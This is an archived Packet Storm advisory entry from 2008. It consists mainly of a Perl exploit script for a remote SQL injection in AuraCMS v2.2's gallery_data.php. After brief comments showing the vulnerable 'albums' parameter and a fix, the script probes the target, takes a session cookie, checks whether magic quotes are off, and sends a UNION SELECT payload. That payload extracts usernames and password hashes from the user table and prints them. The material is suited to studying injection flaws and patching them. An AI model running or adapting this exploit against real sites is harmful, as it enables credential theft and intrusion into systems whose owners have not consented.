auracms22-sql.txt

2008-02-13T00:00:00
ID PACKETSTORM:63579
Type packetstorm
Reporter DNX
Modified 2008-02-13T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
use LWP::UserAgent;  
use HTTP::Cookies;  
use Getopt::Long;  
  
#  
# [!] Discovered.: DNX  
# [!] Vendor.....: http://www.auracms.org  
# [!] Detected...: 19.01.2008  
# [!] Reported...: 25.01.2008  
# [!] Response...: 30.01.2008  
#  
# [!] Background.: AuraCMS is a CMS based on PHP and SQL  
#  
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173  
#  
# 173: case 'detail':  
# 174: if (isset($_GET['id'])){  
# 175: $id = $_GET['id'];  
# 176: $albums = $_GET['albums'];  
#  
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");  
#  
# [!] Solution...: Install gallery update!  
#  
  
if(!$ARGV[1])  
{  
print "\n \\#'#/ ";  
print "\n (-.-) ";  
print "\n ---------------------oOO---(_)---OOo--------------------";  
print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";  
print "\n | (works only with magic quotes = off) |";  
print "\n | coded by DNX |";  
print "\n --------------------------------------------------------";  
print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>";  
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";  
print "\n[!] Options....:";  
print "\n -p [ip:port] Proxy support";  
print "\n";  
exit;  
}  
  
my $host = $ARGV[0];  
my $path = $ARGV[1];  
my %options = ();  
GetOptions(\%options, "p=s");  
  
print "[!] Exploiting...\n";  
  
exploit();  
  
print "\n[!] Exploit done\n";  
  
sub exploit  
{  
my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";  
my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";  
my $ua = LWP::UserAgent->new;  
my $cookie = HTTP::Cookies->new();  
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";  
my $res = "";  
  
if($options{"p"})  
{  
$ua->proxy('http', "http://".$options{"p"});  
}  
  
###############  
# exist file? #  
###############  
$res = $ua->get($url2);  
if(!$res->is_success)  
{  
die("[!] Failed, file not found\n");  
}  
  
##########################  
# get cookie from server #  
##########################  
$res = $ua->get($url1);  
$cookie->extract_cookies($res);  
$ua->cookie_jar($cookie);  
$ua->get($url2);  
$res = $ua->get($url2);  
  
######################  
# check magic quotes #  
######################  
$url2 .= "?action=detail&id=&image=&albums='";  
$res = $ua->get($url2);  
$content = $res->content;  
  
if($content =~ /,\"albums\":\[\"\\\\'\"],/)  
{  
die("[!] Failed, magic quotes on\n")  
}  
  
##############  
# get hashes #  
##############  
$url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";  
$res = $ua->get($url2);  
$content = $res->content;  
  
my @cont = split(/{\"files\"/, $content);  
foreach (@cont)  
{  
if($_ =~ /$regexp/)  
{  
print "$1 $3\n";  
}  
}  
}  
  
`